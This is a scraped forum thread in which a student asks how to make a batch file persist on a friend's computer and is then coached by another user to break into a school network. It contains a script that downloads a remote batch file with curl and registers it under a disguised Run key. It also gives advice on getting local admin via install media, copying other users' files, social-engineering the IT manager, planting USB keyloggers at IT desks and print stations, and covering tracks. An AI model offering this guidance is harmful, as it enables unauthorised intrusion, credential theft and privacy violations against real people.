Bat file move location

[Spoiled_Kitten]

How do i make it so that i can have a batch file which will copy itself, no matter where it is, to the start menu of a computer? wish to mess with a friend. Thanks scarlett

[Eigenvektor]

The first argument of a batch file (%0) its path. You figure out the rest.

[Spoiled_Kitten]

On 6/12/2020 at 12:25 PM, BlueScope819 said:

Are you referring to making it run on startup? This is how I did it:

cd C:%HOMEPATH%\AppData\Roaming\Microsoft\
curl "https://bitbucket.org/JwiC/a/raw/master/a.bat" -o criticalprocess.bat -s
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityProcessManager /d C:\%HOMEPATH%\AppData\Roaming\Microsoft\criticalprocess.bat

It rickrolls people every time they turn on their computer.

That is perfect lol

 

[Spoiled_Kitten]

On 6/12/2020 at 12:25 PM, BlueScope819 said:

Are you referring to making it run on startup? This is how I did it:

cd C:%HOMEPATH%\AppData\Roaming\Microsoft\
curl "https://bitbucket.org/JwiC/a/raw/master/a.bat" -o criticalprocess.bat -s
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityProcessManager /d C:\%HOMEPATH%\AppData\Roaming\Microsoft\criticalprocess.bat

It rickrolls people every time they turn on their computer.

It doesnt actually move it to the startup section, Or atleast for me, my just be stupd computer, Also it doesnt just open it weirdly

 

[Spoiled_Kitten]

2 hours ago, BlueScope819 said:

The REG command is only able to be run in an admin command prompt, if I remember correctly. It's been a while since I've done this. Check out the curl command for the actual code it runs on startup, I just hosted it with a throwaway account on bitbucket for the least number of chars. This was intended for use in a USB rubber ducky, not as an actual batch file to be given to people. You would need to somehow make it like those exe files that the second you open it it asks to make changes to your computer, but I'm not sure how you can code that. All of this work was done in the back of a computer science classroom last school year, before the whole Corona thing so this was at least 6 months ago so I don't remember many of the details.

Oof, im using it at school, trying to troll a fried, but dont have admin perms at my stupid school, gonna find a way to get around , clos but until then cant 

[Spoiled_Kitten]

15 hours ago, BlueScope819 said:

Yeah if your school is running windows without drive encryption you can try this:

 

II cant see anythhing lol, might just be cause youtube is blocked

 

[Spoiled_Kitten]

5 minutes ago, Spoiled_Kitten said:

II cant see anythhing lol, might just be cause youtube is blocked

 

NVM i think i found it

[Spoiled_Kitten]

7 minutes ago, BlueScope819 said:

Okay, here is the plaintext link if it's not inserted for you.

https://www.youtube.com/watch?v=IoAymgapqrg

Wrong link first time, I changed it to the correct one @Spoiled_Kitten

Ah yeah, saw the name thought it was wrong lol.

[Spoiled_Kitten]

13 minutes ago, BlueScope819 said:

Okay, here is the plaintext link if it's not inserted for you.

https://www.youtube.com/watch?v=IoAymgapqrg

Wrong link first time, I changed it to the correct one @Spoiled_Kitten

When u talk about encryption do you mean like bit locker? they have a thing where unless u have perms from the server u cant access some files

[Spoiled_Kitten]

2 minutes ago, BlueScope819 said:

I think what you are referring to is the active directory messing with perms, but if you have local admin you can do whatever you want and override it if the files are on the local machine and not stored on the network. Or, if any account on the machine has access you can just force reset their password, log into their account, and go to town.

Okay, so once i follow that video, i should be able to access all files, have all perms and everything? they have a server where files are stored on, can i access user files on there if i was able to make myself an admin?

[Spoiled_Kitten]

3 minutes ago, BlueScope819 said:

I think what you are referring to is the active directory messing with perms, but if you have local admin you can do whatever you want and override it if the files are on the local machine and not stored on the network. Or, if any account on the machine has access you can just force reset their password, log into their account, and go to town.

Would there be an easier way where i can copy the entire drive (even without perms to do so) so i can look into it at home? cause i dont have long when around it to do so so i want to find another way to do it, maybe will have passwords saved on it.

[Spoiled_Kitten]

Just now, BlueScope819 said:

Depends on how it's been configured. You need a windows install USB which you can download the tool to create on the microsoft website, google media creation tool and you need a USB drive of at least 8gb. If you have local admin and it's a simple network share, then yeah, you should be able to access the files. If you watch the whole video it discusses some other common attack vectors so perhaps you could compromise active directory but if you are doing this in school or whatever you are bound to get caught, unfortunately in the U.S. we have something called the computer misuse act...not sure how it is upside down. I think just getting local admin is fine tho.

Not in the USA, im in aus, will look into it, but so i should be able to, can i copy these files to another usb or not possible?

[Spoiled_Kitten]

10 minutes ago, BlueScope819 said:

Yeah, if you know what you are looking for that's not a problem. I did say that "not sure how it is upside down" the objective of course being to avoid you getting into trouble. Just booting off of the install medium and copying files probably isn't an issue, as it's very difficult to set up monitoring for that sort of thing. If you watch the entire video it will give you a step by step guide. Getting local admin is different because you would be creating an admin account to use yourself which will get noticed real fast if your school has competent IT department which is probably not the case.

We have an IT people who monitors the system, i got in trouble once for using 2gb of there "data" in 1 hour lol. So i should be able to do it without them noticing. but yeah so how hard would it be to duplicate the entire thing to a USB hard drive? i know that ever user only gets 100mb of space (which is insaneeeeee) 100mb is nothing, couple of documents, and full!

 

Edit: I know for a fact that they use net control 2.

[Spoiled_Kitten]

 

10 minutes ago, BlueScope819 said:

Yeah, if you know what you are looking for that's not a problem. I did say that "not sure how it is upside down" the objective of course being to avoid you getting into trouble. Just booting off of the install medium and copying files probably isn't an issue, as it's very difficult to set up monitoring for that sort of thing. If you watch the entire video it will give you a step by step guide. Getting local admin is different because you would be creating an admin account to use yourself which will get noticed real fast if your school has competent IT department which is probably not the case.

The main thing i really want is to have access to use the IT managers account. That would be AMAZING! cause i cant do much without it,

[Spoiled_Kitten]

2 minutes ago, BlueScope819 said:

Okay, so how is it configured on the local network? Is it one physical machine? Because what you entrypoint here is local admin. If other people use the same physical machine then yeah you can make your own localadmin account and copypaste their documents folders or whatever to a usb drive that you can plug in along with an install medium. If their IT managers account is simply another account on the local machine then just copy the contents of their user folder to your USB stick and explode at home. If it's multiple machines on the local network, which it probably is, either you have to do this exploit on the actual machine the admins account is on, which is probably impossible. The other way it could possibly be configured is that all of the user files are on a server and you simply use your creds to log into said server on any machine. This is how it was set up at my high school, but they changed that. To compromise that you would need a admin account on the server which really depends on how they have set that up. I'm not an xpert hax0r here, just trying to give general advice.

ok so i they have it where you can use a physical device, then when u login it downloads your account to the device, once that is done u are in, it uploads what u do to the server as well, when u log out your files are still there (to try and make it quicker to access your account)

[Spoiled_Kitten]

3 minutes ago, BlueScope819 said:

Okay, so I see the trick here. Say to your It manger "hey my googlz isnt working!!!1/1?1!1" and have him log in if possible, or try and figure out a machine that he logged on to. Complete said exploit, and copy his files. Pwned. Depending on what software they use once you have his creds from looking at his user folder (could be stored really anywhere user folder is a small subset of data stored on windows), you can simply determine how to log into the server and go crazy. Do whatever, make everyones account admin or something. You just have to be real careful covering your tracks, I trust you aren't an idiot in that department.

Yeah i can have a look into it, its kinda hard though, they usually don't but i may be able to get them to, will be hard, maybe make software that copies it all automatically, then have a USB, sneak in one time and plug it in?(really unlikely lol) anbd yeah i know about covering tracks, My old method was to nuke the systems,

1 minute ago, BlueScope819 said:

Oh also if they are using desktops you can get a USB keylogger to stick in between his keyboard and computer (hard to notice unless you are looking at the back of the machine) and you download the results via wifi. He probably logs into the server daily or whatever to check so you can get the creds that way as well and he won't know the entrypoint.

They have an IT department which they log into to manage, maybe if i could find a small logger (no clue where to get one) i could use it to log there inputs. would be hard as we have no devices out unless using for class rule (stupid).

[Spoiled_Kitten]

1 minute ago, BlueScope819 said:

https://maltronics.com/collections/wifi-keyloggers

It looks like a mouse dongle, it plugs in in between the keyboard and computer. You need about 5 seconds to plug it in, just make sure to do the configuration before hand. If all of the things are saved to a server that may be difficult, really your only way to get the creds is something similar to that. It does not have to be that exact model. Another thing you can do is if there is a print station where a whole bunch of people log on just to print something you can stick it in there and get their account creds no problem.

Touch pad keyboard for print stations... and what do u mean by configurated before hand? like have it so that it is it automatically uploads to the web? also they usually close the door so may be hard, will have to look into it. I could try and get a teachers account(they have some perms) but i want to it persons

[Spoiled_Kitten]

5 minutes ago, BlueScope819 said:

By preconfigured what I mean is it puts out a wifi network that you connect to and then connect to the device from there. (Like you connect to your router with 192.168.1.1). That's how you extract the logged keys from it. You need to set it up so that the wifi network isn't called "usb keylogger" for example. What do you mean by touch pad keyboards? As long as it interfaces via USB you can stick a keylogger in between it and the tower to get creds, that's just a fun thing to do. The primary thing would be to stick it between the keyboard and tower in IT, but that requires some slight of hand and may not be possible. If you just want to have fun you can plug them in at the most popular print station and log into others accounts normally like you usually would on the computers, and steal their files.

That would be fun, But i mean that its one of those ones that has a touch screen display, where to print u have to use the touch screen (built in) but another way is to use my library, they are used quite often so would be good.